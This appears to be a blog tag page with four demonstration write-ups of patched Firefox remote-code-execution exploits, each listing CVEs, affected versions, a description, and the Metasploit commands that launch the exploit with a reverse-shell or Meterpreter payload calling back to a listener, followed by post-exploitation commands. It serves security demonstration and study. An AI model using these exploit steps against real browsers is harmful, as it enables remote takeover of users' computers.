Posts tagged Mozilla

MFSA-2014-29 Firefox WebIDL Privileged Javascript Injection

Timeline :

Vulnerabilities discovered by Marius Mlynski via TippingPoint's Pwn2Own contest
Patched by the vendor via MFSA-2014-29 on 2015-03-18
Metasploit PoC provided on 2014-08-27

PoC provided by :

Marius Mlynski
joev

Reference(s) :

CVE-2014-1510
CVE-2014-1511
MFSA-2014-29

Affected version(s) :

Firefox 22 to 27 inclusive

Tested on :

Firefox 27 on Windows 7 SP1

Description :

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's JavaScript APIs.

Commands :

use exploit/multi/browser/firefox_webidl_injection
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.6.138
run

SYSTEMINFO

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 on 2013-05-12
Patched by the vendor on 2013-08-06
Metasploit PoC provided on 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All versions of Mozilla Firefox between 15 and 22 inclusive.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate JavaScript-related vulnerabilities to ultimately inject malicious JavaScript code into a context running with chrome:// privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
exploit

SYSTEMINFO

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to the vendor by ZDI on 2012-11-21
Vulnerability corrected by the vendor on 2013-01-08
Metasploit PoC provided on 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox prior to 17.0.2

Tested on :

Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found in Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object when using the serializeToStream method with a specially crafted OutputStream that defines its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Marius Mlynski on 2012-11-21
Vulnerability corrected by the vendor on 2013-01-08
Metasploit PoC provided on 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG "use" element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit, but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo